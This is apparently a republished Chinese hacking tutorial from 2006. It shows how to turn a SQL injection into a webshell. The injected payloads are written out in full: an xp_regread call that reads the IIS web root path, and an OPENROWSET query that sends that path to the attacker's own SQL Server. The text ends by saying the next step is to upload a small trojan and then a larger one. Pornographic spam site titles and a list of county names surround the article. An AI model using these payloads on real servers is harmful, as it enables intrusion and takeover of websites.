最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

滲透中用openrowset搞shell的方法

 更新時間:2006年12月07日 00:00:00   作者:  
滲透中用openrowset搞shell的方法 
得到SQL注入點,首先想到的是BACKUP WEBSHELL,扔在NB里跑一圈,發(fā)現(xiàn)屏蔽了SQL錯誤信息,得不到物理路徑,那還寫個PP馬了.
聯(lián)想到一個權限不是很高的命令openrowset,進行跨庫服務器查詢,就是把一個SQL命令發(fā)送到遠程數(shù)據(jù)庫,然后看返回的結果,但是要啟動事件跟蹤!我們可以把網(wǎng)站信息寫入數(shù)據(jù)庫,然后%$^%$@#$@^%$~
首先在自己機器建立SQL數(shù)據(jù)庫 

然后在對方機器上建立個表 create table [dbo].[fenggou]([cha8][char](255))--

在對方執(zhí)行 DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into fenggou (cha8) values('select a.* FROM OPENROWSET(''SQLOLEDB'',''自己的IP'';''sa'';''你的密碼'', ''select * FROM pubs.dbo.authors where au_fname=''''' + @result + ''''''')AS a');--

這樣fenggou這個表里就會有這樣一條記錄select a.* FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密碼', 'select * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a

不用說,''D:\WEB"就是從注冊表里讀出的物理路徑拉.然后執(zhí)行DECLARE @a1 char(255) set @a1=(select cha8 FROM fenggou) exec (@a1);--

等于執(zhí)行了select a.* FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密碼', 'select * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a

OK,這時你在你機器上SQL事件追蹤器上就會顯示select * FROM pubs.dbo.authors where au_fname='D:\WEB,,1' 
哇 哈哈哈哈哈 物理路徑到手了 寫小馬傳大馬吧~ 

相關文章

最新評論

兖州市| 晋中市| 新田县| 千阳县| 遂昌县| 内丘县| 腾冲县| 嘉荫县| 曲松县| 庆元县| 田东县| 大安市| 祁连县| 双峰县| 道真| 漳州市| 阿克陶县| 梁平县| 新绛县| 湘乡市| 廉江市| 湟源县| 南和县| 林甸县| 弋阳县| 沾益县| 特克斯县| 舟曲县| 柏乡县| 平顺县| 云和县| 鸡东县| 正蓝旗| 桃园市| 灵武市| 高台县| 曲靖市| 华容县| 沈丘县| 靖江市| 连城县|